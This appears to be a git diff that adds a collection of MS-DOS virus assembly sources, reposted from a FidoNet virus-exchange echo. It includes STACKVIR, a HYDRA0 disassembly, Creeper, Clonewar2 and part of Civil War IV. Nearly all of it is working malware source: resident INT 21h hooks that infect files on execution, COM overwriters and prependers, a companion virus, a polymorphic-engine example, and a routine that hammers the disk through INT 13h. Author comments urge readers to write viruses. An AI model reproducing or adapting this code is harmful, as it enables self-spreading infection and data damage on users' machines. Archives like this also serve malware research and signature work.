:= 0 + mov es,cx + mov cl,v_len ; CX := virus length + rep movsb ; Move the virus body there + +; Transfer control to cont: by PUSHing its address +; on the stack and executing RETF: + + push es + mov ax,cont-v_entry+seg_60 + push ax + retf + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +; Resume execution from here (but already in segment 60h): + +cont: + +; Install new INT 21h handler and move the old one at INT 32h: + + mov di,21*4 + mov cl,2 + mov ax,int_21-v_entry+seg_60 + cld +lp: + push word ptr es:[di] ; Get old handler's address + pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h + stosw ; Install the new one + mov ax,cs + loop lp ; Loop until done + +; Save the original first 4 bytes of the infected program on the stack: + + push word ptr cs:[first4-v_entry+seg_60] + push word ptr cs:[first4+2-v_entry+seg_60] + +run_pgm: + mov di,offset start ; Point DI at program's start + pop word ptr [di+2] ; Restore the first 4 bytes of the program + pop word ptr [di] + pop ax ; Restore the original value of AX + push ds + push ds ; ES := DS + pop es + push di ; Push 100h on the stack + retf + +mem_chk: + +; Push the original first 4 bytes of the infected program on the stack: + + push word ptr [si+first4-v_entry] + push word ptr [si+first4+2-v_entry] + jmp run_pgm ; And run the original program + +int_21: ; New INT 21h handler + cmp ah,0E9 ; Memory check? + je mem_chk ; If infected, run the original program + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + mov bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,first4-v_entry+seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + sub ax,3 ; Subtract 3 (first instruction length) + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FMail 0.96 +; + Origin: This virus is Microsoft Windows (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/iPATH Search PATH for include files +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir32.asm b/MSDOS/Virus.MSDOS.Unknown.vir32.asm new file mode 100644 index 00000000..07a9d88d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir32.asm @@ -0,0 +1,229 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 22 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : STACKVIR.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 16:43) +;* To : Edwin Cleton +;* Subj : STACKVIR.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org +; +; +; V I R U S P R O T O T Y P E +; +; Author : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd +; Date : 25 Jan 1991 21:05 +; Function : Found DOS stack in put himself in it. Then trace DOS +; function EXEC and type 'Infect File' +; +; +; If you want to have fun with this program just run file STACK.COM +; Don't worry, this is not a virus yet, just try to find him in memory +; with PCTools and/or MAPMEM. If you can -> just erase the source - it is +; useless for you. If you can't -> you don't have to look at it - it is too +; difficult to you to understand it. +; Best regards, Waleri Todorov +; +; + + + + + mov ah,52h ; Get DOS segmenty + int 21h + + cmp ax,1234h ; Also check for already here + jne Install ; If not -> install in memory +ReturnControl + + int 20h ; This program will give control + ; to main file +Install + mov ax,es ; mov DOS segment in AX + mov DosSeg,ax ; Save DOS segment for further usage + mov ds,ax ; DS now point in DOS segment + + call SearchDos ; Search DOS entry point + call SearchStack ; Search DOS stack + + push cs ; DS=ES=CS + push cs + pop ds + pop es + + mov ax,DosSeg ; get DOS segment in AX + mov cl,4 ; AX*=16 + shl ax,cl + mov bx,StackOff ; Stack new begin in BX + and bx,0FFF0h ; Mask low 4 bit + add ax,bx ; Compute new real address + mov cl,4 ; AX/=16 + shr ax,cl ; Now we get SEGMENT:0000 + sub ax,10h ; Segment-=10-> SEG:100h + mov StackOff,ax ; Save new segment for further usage + mov es,ax ; ES point in DOS New area + mov si,100h ; ES:DI -> DOS:free_space_in_stack + mov di,si ; DS:SI Current segment + mov cx,512d ; Virus is only 512 bytes long + rep movsb ; Move virus to new place + +; Installing virus in DOS' stack we will avoid a conflict with PCTools, +; MAPMEM, and other sys software. Remark, that no one DOS buffer wasn't +; affected, so if you have program, that count DOS' buffers to found +; Beast666, she won't found anything. +; In further release of full virus I will include anti-debugger system, +; so you will not be able to trace virus + + mov di,DosOff ; ES:DI point to DOS int21 entry point + mov ax,DosSeg + mov es,ax + mov al,0EAh ; JMP XXXX:YYYY + stosb + mov ax,offset Entry21 + stosw ; New 21 handler's offset + mov ax,StackOff + stosw ; New 21 handler's segment + + +; Now DOS will make far jump to virus. In case that virus won't +; get vector 21 directly, MAPMEM-like utilities won't show int 21 catching, +; and DOSEDIT will operate correctly (with several virus he don't). + + inc di + inc di + mov Int21off,di ; Virus will call DOS after jump + jmp ReturnControl ; Return control to file + +; At this moment, return control is just terminate program via int 20h. +; In further release of full virus this subroutine will be able to +; return control to any file (COM or EXE). + + + +; These are two scanners subroutine. All they do are scanning DOS segment +; for several well-known bytes. Then they update some iternal variables. +; Be patience, when debug this area! + +SearchDos + mov ax,cs:[DosSeg] + mov ds,ax + xor si,si + +Search1 + lodsw + cmp ax,3A2Eh + je NextDos1 + dec si + jmp short Search1 +NextDos1 + lodsb + cmp al,26h + je LastDos + sub si,2 + jmp short Search1 +LastDos + inc si + inc si + lodsb + cmp al,77h + je FoundDos + sub si,5 + jmp short Search1 +FoundDos + inc si + mov cs:[Int21off],si + sub si,7 + mov cs:[DosOff],si + ret + +SearchStack + xor si,si +Search2 + lodsw + cmp ax,0CB8Ch + je NextStack1 + dec si + jmp short Search2 +NextStack1 + lodsw + cmp ax,0D38Eh + je NextStack2 + sub si,3 + jmp short Search2 +NextStack2 + lodsb + cmp al,0BCh + je FoundStack + sub si,4 + jmp short Search2 +FoundStack + mov di,si + lodsw + sub ax,200h + stosw + mov cs:[StackOff],ax + ret + +Entry21 ; Here is new int 21 handler + cmp ah,52h ; If GET_LIST_OF_LISTS + jne NextCheck + + mov ax,1234h ; then probably I am here + mov bx,cs:[DosSeg] ; so return special bytes in AX + mov es,bx + mov bx,26h + iret ; Terminate AH=52h->return to caller +NextCheck + cmp ax,4B00h ; If EXEC file + jne GoDos + call Infect ; then file will be infected +GoDos + jmp dword ptr cs:[Int21off] + ; Otherwise jump to DOS +Infect + push ds ; At this moment just write on screen + push dx + push ax + + push cs + pop ds + mov dx,offset Txt + mov ah,9 +CallDos + pushf ; Call real DOS + call dword ptr cs:[Int21off] + + pop ax + pop dx + pop ds + ret + +Int21off dw 0 ; Offset of DOS 21 AFTER jump to virus +DosSeg dw 0 ; DOS segment +StackOff dw 0 ; Offset of stack/New segment +DosOff dw 0 ; Offset of DOS 21 BEFIRE jump +Txt db 'Infect File$' ; Dummy text + +;-+- FMail 0.96 +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/Twx Windows image +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir33.asm b/MSDOS/Virus.MSDOS.Unknown.vir33.asm new file mode 100644 index 00000000..42dec4ac --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir33.asm @@ -0,0 +1,228 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 23 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : HYDRA_0.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 16:44) +;* To : Mark Hapershaw +;* Subj : HYDRA_0.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org +PAGE 59,132 + +; +; +; HYDRA0 +; +; +; Disassembly by: -=>Wasp<=- aka >>Night Crawler<< +; +; Reassemble with TASM 2.0 +; + +DATA_1E EQU 80H +DATA_18E EQU 2E0H +DATA_19E EQU 2E3H + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +HYDRA0 PROC FAR + +START: + JMP LOC_1 ; (0225) + DB 59H, 44H, 00H, 00H +DATA_4 DB 'HyDra Beta - Not For Release' + DB '. *.CO?' + DB 0 +DATA_7 DW 0, 84FCH +DATA_9 DW 0 +DATA_10 DB 0 + DB 29 DUP (0) +DATA_11 DB 0 + DB 13 DUP (0) +COPYRIGHT DB 'Copyright (c)' +DATA_12 DB ' 1991 by C.A.V.E. HYDRA$' + DB 'Watch for the many heads.', 0DH, 0AH + DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 0DH + DB 0AH, 0DH, 0AH, 0DH, 0AH, 'The fir' + DB 'st eight are easy to find and ki' + DB 'll.', 0DH, 0AH, 0DH, 0AH, 'Their' + DB ' replacements will be more sophi' + DB 'sticated.$' + DB '(c) 1991 - C. A. V. E.$' +LOC_1: + PUSH AX + MOV AX,CS + ADD AX,1000H + XOR DI,DI ; Zero register + MOV CX,2E0H + MOV SI,OFFSET DS:[100H] + MOV ES,AX + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + MOV AH,1AH + MOV DX,OFFSET DATA_10 + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + MOV AH,4EH ; 'N' + MOV DX,OFFSET DATA_4+22H + INT 21H ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + JC LOC_5 ; Jump if carry Set +LOC_2: + MOV AH,3DH ; '=' + MOV AL,2 + MOV DX,OFFSET DATA_11 + MOV AL,2 + INT 21H ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + MOV BX,AX + PUSH ES + POP DS + MOV AX,3F00H + MOV CX,0FFFFH + MOV DX,DATA_18E + INT 21H ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + ADD AX,2E0H + MOV CS:DATA_9,AX + CMP WORD PTR DS:DATA_19E,4459H + JNE LOC_3 ; Jump if not equal + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS + MOV AH,4FH ; 'O' + INT 21H ; DOS Services ah=function 4Fh + ; find next filename match + JC LOC_6 ; Jump if carry Set + JMP SHORT LOC_2 ; (0247) +LOC_3: + XOR CX,CX ; Zero register + MOV DX,CX + MOV AX,4200H + INT 21H ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + JC LOC_4 ; Jump if carry Set + MOV AH,40H ; '@' + XOR DX,DX ; Zero register + MOV CX,CS:DATA_9 + INT 21H ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +LOC_4: + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS +LOC_5: + MOV AH,1AH + MOV DX,DATA_1E + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + JMP SHORT LOC_7 ; (02F0) + DB 90H +LOC_6: + PUSH DX + XOR AX,AX ; Zero register + MOV AX,0F00H + INT 10H ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + MOV AH,0 + INT 10H ; Video display ah=functn 00h + ; set display mode in al + MOV AX,200H + MOV DH,6 + MOV DL,25H ; '%' + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + XOR DX,DX ; Zero register + MOV DX,OFFSET DATA_12+14H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,0BH + MOV DL,1BH + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + MOV DX,OFFSET DATA_12+1AH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,17H + MOV DL,0 + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + MOV DX,OFFSET DATA_12+9EH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,18H + MOV DL,0 + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + MOV AX,4C00H + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_7: + XOR DI,DI ; Zero register + MOV SI,OFFSET DATA_16 + MOV CX,0D3H + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + POP BX + MOV CS:DATA_7,0 + MOV WORD PTR CS:DATA_7+2,ES + POP BX + JMP DWORD PTR CS:DATA_7 +DATA_16 DB 1EH + DB 07H,0B9H,0FFH,0FFH,0BEH,0E0H + DB 03H,0BFH, 00H, 01H, 2BH,0CEH + DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H + DB 01H, 00H, 01H, 2EH, 8CH, 1EH + DB 02H, 01H, 8BH,0C3H, 2EH,0FFH + DB 2EH, 00H, 01H + DB ' Coalition of American Viru' + DB 's Engineers -=-=- ' + DB ' Dedicated to supporting the' + DB ' anti-virus industry withou' + DB 't recognition or reward. ' + DB ' -=-=- ' + DB 0CDH, 20H + +HYDRA0 ENDP + +SEG_A ENDS + + + + END START + +;-+- PPoint 1.86 +; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;Options: /m = map file with publics +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) +; diff --git a/MSDOS/Virus.MSDOS.Unknown.vir34.asm b/MSDOS/Virus.MSDOS.Unknown.vir34.asm new file mode 100644 index 00000000..7245f632 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir34.asm @@ -0,0 +1,361 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 24 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CREEPER.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 16:45) +;* To : Mike Salvino +;* Subj : CREEPER.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +; +; Demoralized Youth proudly presents: Creeper v1.0, Original Source +; +; Written by: TORMENTOR +; +; Yez, here it is... It's not like 4096 or Pogue, but it's a virus! +; The reason why I release the original source is that I think I +; can't do much more on this virus... I will start from scratch +; and write a larger and more smarter EXE-virus... +; And if I release this source maybe YOU will get some god ideas and +; write your own virus (or rewrite this!)... +; And if you do, Great! Feel free to mix with it as much as you want +; but please don't change this file! +; Well, go on and write virus! The world is to safe! +; +; +; Regards / TORMENTOR +; + +code segment byte public + assume cs:code, ds:code, es:code, ss:code + + + org 100h + + +codebeg: + + + mov ax,043FFh ; Remove virus from code! + int 21h + +; Let's allocate some mem! + + mov ax,ds + sub ax,11h + mov ds,ax + cmp byte ptr ds:[0100h],5Ah + jnz skip + mov ax,ds:[0103h] + sub ax,40h + jb skip + mov ds:[0103h],ax + sub word ptr ds:[0112h],50h + mov es,ds:[0112h] + push cs + pop ds + mov cx,code_end-codebeg + mov di,100h + push di + mov si,di + rep movsb + + push es + pop ds + + mov ax,351Ch + int 21h + mov word ptr ds:[int1Cret],bx + mov word ptr ds:[int1Cret+2],es + mov al,21h + int 21h + mov word ptr ds:[real21+1],bx + mov word ptr ds:[real21+3],es + + mov ah,25h + mov dx,offset int21beg + int 21h + mov al,1Ch + mov dx,offset int1Cnew + int 21h + + push cs + push cs + pop es + pop ds + + ret + +skip: int 20h + + +int21beg: push ax + sub ax,4B00h + jz infect + pop ax + cmp ax,043FFh ; Check if Harakiri. + jne real21 + + mov ax,word ptr ds:[retdata] + mov si,ax + mov di,100h + mov cx,code_end-codebeg + rep movsb + + mov ax,100h + + pop cx + pop cx + push es + push ax + iret + +real21: db 0EAh, 00h, 00h, 00h, 00h ; Jump to org21vec. + + +retdata: db 00h, 00h + +f_time: dw 0000h + +f_date: dw 0000h + +infect: pop ax + + push ax + push bx + push cx + push di + push ds + push dx + push si + + + mov ah,43h ; Get file attr. + int 21h + mov ax,4301h + and cx,0FEh ; Strip the Read-only-flag + int 21h + + mov ax,3D02h ; Open victim. + int 21h + + xchg ax,bx + + call sub_2 + +sub_2: mov di,sp ; God what I hate that Eskimo! + mov si,ss:[di] + inc sp + inc sp + + push cs + pop ds + + mov ax,5700h ; Get file's time and date + int 21h + mov [si-(sub_2-f_time)],cx + mov [si-(sub_2-f_date)],dx ; And save them... + + mov ah,3Fh ; Read X byte from begin. + mov cx,code_end-codebeg + add si,code_end-sub_2 ; SI points to EOF + mov dx,si + int 21h + + + cmp word ptr [si],'MZ' ; Mark Zimbowski? + je close + cmp word ptr [si],'ZM' ; Zimbowski Mark? + je close +mark: cmp word ptr [si+(mark-codebeg+4)],'YD' ; infected? + je close + + call put_eof ; move file ptr to EOF + + cmp ax,(0FFFFh-(code_end-codebeg)-100h) + ja close + cmp ax,code_end-codebeg+100h + jb close + + add ax,100h + mov word ptr ds:[si-(code_end-retdata)],ax + + mov ah,40h ; Flytta beg to end. + mov cx,code_end-codebeg + mov dx,si + int 21h + + mov ax,4200h ; fptr to filbeg. + xor cx,cx + xor dx,dx + int 21h + + mov ah,40h ; Write virus to beg. + mov cx,code_end-codebeg + mov dx,si + sub dx,cx + int 21h + +close: mov ax,5701h + mov cx,[si-(code_end-f_time)] + mov dx,[si-(code_end-f_date)] + int 21h + + mov ah,3Eh + int 21h ; close file, bx=file handle + + pop si + pop dx + pop ds + pop di + pop cx + pop bx + pop ax + + + jmp real21 + +put_eof: mov ax,4202h + xor dx,dx + xor cx,cx + int 21h + ret + + +int1Cnew: + + push ax + inc byte ptr cs:[counter] + mov al,30h + cmp byte ptr cs:[counter],al + jz scan + pop ax + + +slut: jmp dword ptr cs:[int1Cret] + +scan: + push bx + push cx + push di + push ds + push dx + push es + push si + + + push cs + pop ds + + cld + xor bx,bx + mov byte ptr cs:[counter],bh + mov cx,0FA0h + + mov ax,0b800h + mov es,ax + xor di,di + +again: mov al,byte ptr cs:[text+bx] + sub al,80h + repnz scasb + jnz stick + +maybe: inc di + inc bx + cmp bx,10d + jz beep + + mov al,byte ptr cs:[text+bx] + sub al,80h + scasb + jz maybe + xor bx,bx + jmp again + +beep: + xor cx,cx + mov bx,word ptr cs:[int1Cret] + mov es,word ptr cs:[int1Cret+2] + mov ax,251Ch + int 21h + +overagain: mov dx,0180h + xor bx,bx + +reset: mov ah,00h + inc bx + cmp bl,5h + jz raise + inc cx + int 13h + +hoho: mov ax,0380h + inc cx + int 13h + jc reset + jmp hoho + +raise: xor cx,cx + xor bx,bx + inc dx + cmp dl,85h + jnz hoho + jmp overagain + +stick: + pop si + pop es + pop dx + pop ds + pop di + pop cx + pop bx + pop ax + + + jmp slut + + +counter: db 00h + +text: db 'T'+80h, 'O'+80h, 'R'+80h, 'M'+80h, 'E'+80h, 'N'+80h + db 'T'+80h, 'O'+80h, 'R'+80h, '!'+80h + + ; This is what it scans the screen for --^ + +int1Cret: db 0EAh, 00h, 00h, 00h, 00h + +code_end: ; THE END. + +code ends +end codebeg + +; +; Greetings to: Charlie, HITMAN, Wiper, Torpedo, Tortuer, WiCO, Drive Screwer +; And ALL other virus-writers! +; + +;-+- FidoPCB v1.4 [NR] +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/Txx Specify output file type +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir35.asm b/MSDOS/Virus.MSDOS.Unknown.vir35.asm new file mode 100644 index 00000000..6f5dd19e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir35.asm @@ -0,0 +1,193 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 25 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CLONWAR2.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 16:47) +;* To : Bryan Sullivan +;* Subj : CLONWAR2.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org +;Clonewar V2.0 +;Ŀ +; Assembly Source Listing for Clonewar V2 Companion Virus +; Copyright (c) 1993 All Rights Reserved. :) +;Ĵ +; The Clonewar is a direct action companion virus. This version is simply +; a partial code optimization of the original.... +; +; + +CSEG SEGMENT + ASSUME CS:CSEG,DS:NOTHING + + ORG 100H + +START: + jmp VIR_BEGIN ;lets get moving... + + +; db "[CloneWar2]" ;i really hate the waste... +WILDCARD DB "*.EXE",0 +FILE_EXT DB "COM",0 +FILE_FOUND DB 12 DUP(' '), 0 +FILE_CREATE DB 12 DUP(' '), 0 +SEARCH_ATTRIB DW 17H +NUM_INFECT DW 0 + + +My_Cmd: +CMD_LEN DB 13 +FILE_CLONE DB 12 DUP (' '), 0 + +; +; Read all the directory filenames and store as records in buffer. +; + +Vir_begin: + + mov sp,offset STACK_HERE ;move stack down + mov bx,sp + add bx,15 + mov cl,4 + shr bx,cl + mov ah,4ah ;deallocate rest of memory + int 21h + + mov di,OFFSET FILE_CLONE ;Point to buffer. + mov si,OFFSET FILE_FOUND + mov cx,12 + rep movsb + +Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search + mov cx,SEARCH_ATTRIB + + mov ah,4Eh ;find first matching file + int 21h + + jc EXIT ;If empty directory, exit + +; + +Store_name: + + mov di,OFFSET FILE_FOUND ;Point to buffer. + mov si,158 ;stow the file found in buffer + mov cx,12 + rep movsb + + mov di,OFFSET FILE_CREATE ;Point to buffer. + mov si,158 + mov cx,12 + rep movsb + + cld + mov di,OFFSET FILE_CREATE + mov al,'.' + mov cx,9 + repne scasb ;find the '.' + + mov si,OFFSET FILE_EXT + mov cx,3 + rep movsb ;replace the .EXE with .COM + ;from buffer + +; + +Check_file: ;does the file exist? + mov dx,OFFSET FILE_CREATE + xor cx,cx + mov ax,3d00h ;Open file, read only + int 21h + jnc find_next + +; +Infect_file: ;create companion routine + + mov dx,OFFSET FILE_CREATE ;contains name of "companion" + xor cx,cx + mov ah,3ch ;construct file + int 21h + jc EXIT + + ;Write virus to companion file + xchg bx,ax + mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length + mov dx,OFFSET START + mov ah,40h ;write to file function + int 21h ;do it + + ;Close file + mov ah,3eh ;assumes bx still has file handle + int 21h + + ;Change attributes + mov dx,OFFSET FILE_CREATE ;of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + jmp prepare_command + +; +;...findnext... +; +find_next: + mov ah, 4fh ;find next... + int 21h + jmp store_name +; +Prepare_command: + + cld + mov di,OFFSET FILE_CLONE + mov al,0 + mov cx,12 + repne scasb ;find the end of string \0 + + mov al,0Dh ; + stosb ;replace \0 with a + + mov ax,12 ;store length of the command + sub ax,cx + mov CMD_LEN, al + +; + +Exit: + ;Run the original program + mov si, OFFSET MY_CMD + int 2Eh ;Pass command to command + ;interpreter for execution + mov ax,4C00H ;Exit to DOS + int 21h + + +END_OF_CODE = $ + +STACK_HERE EQU END_OF_CODE + 512 + +CSEG ENDS + END START + +;-+- FidoPCB v1.4 [NR] +; + Origin: Fred's Place (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir36.asm b/MSDOS/Virus.MSDOS.Unknown.vir36.asm new file mode 100644 index 00000000..316d83c1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir36.asm @@ -0,0 +1,229 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 26 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CIVIL411.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Dr T , 2:283/718 (06 Nov 94 16:48) +;* To : Mike Nisbett +;* Subj : CIVIL411.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org +;**************************************************************************** +;* Civil War IV v1.1 (minor bugfix version) * +;* * +;* Assembled with Tasm 2.5 * +;* * +;* (c) 08-01-93 Dark Helmet, The Netherlands. * +;* The author takes no responsibilty for any damages caused by the virus * +;* * +;* This is a example virus with the TPE engine to teach you how to use * +;* the TPE engine. * +;* * +;*--------------------------------------------------------------------------* +;* * +;* Notes: * +;* * +;* This virus is NOT dedicated to Sara Gordon, but to all the innocent * +;* people who are killed in Yugoslavia. * +;* * +;* The text in the virus is taken from the song Civil War (hence the name) * +;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. * +;* * +;* The first name for the virus was NAVIGATOR II, because the virus is * +;* based on the NAVIGATOR virus (also written by me, a while back), but * +;* since I decided to put the songtext in it I renamed it to Civil War IV * +;* * +;* You need the TPE 1.3 engine to link this program. * * +;* * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + org 100h + +len equ offset tpe_top - begin + +Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h + +Begin: call virus ; calculate delta offset + +Virus: pop bp + sub bp,offset virus + + mov dx,0fe00h ; DTA instellen + mov ah,1ah + int 21h + +Restore_begin: call rnd_init ; init random generator + mov di,0100h + lea si,ds:[buffer+bp] + mov cx,06h + rep movsb + +First: lea dx,[com_mask+bp] ;get first COM file + mov ah,04eh + xor cx,cx + int 21h + +Open_file: mov ax,03d02h ;open for READ/WRITE + mov dx,0fe1eh + int 21h + mov [handle+bp],ax + xchg ax,bx + +Read_date: mov ax,05700h ;store date/time for later + int 21h ;use + mov [date+bp],dx + mov [time+bp],cx + +Check_infect: mov bx,[handle+bp] ;check if initials present in + mov ah,03fh ;file + mov cx,06h + lea dx,[buffer+bp] + int 21h + + mov al,byte ptr [buffer+bp]+3 ;Compare initials + mov ah,byte ptr [buffer+bp]+4 + cmp ax,[initials+bp] + jne infect_file ;if initials not present + ;start infecting file + +Close_file: mov bx,[handle+bp] ;close file + mov ah,3eh + int 21h + +Next_file: mov ah,4fh ;get next COM file + int 21h ;in directorie + jnb open_file + jmp exit + +Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file + sub ax,03h + mov [lenght+bp],ax + mov ax,04200h ;goto begin of file + call move_pointer + +Write_jump: mov ah,40h ;Write JUMP intruction + mov cx,01h + lea dx,[jump+bp] + int 21h + + mov ah,40h ;Write JUMP offset + mov cx,02h + lea dx,[lenght+bp] + int 21h + + mov ah,40 ;Write initials to check + mov cx,02h ;for infection later + lea dx,[initials+bp] + int 21h + + mov ax,4202h ; move to end of file + call move_pointer 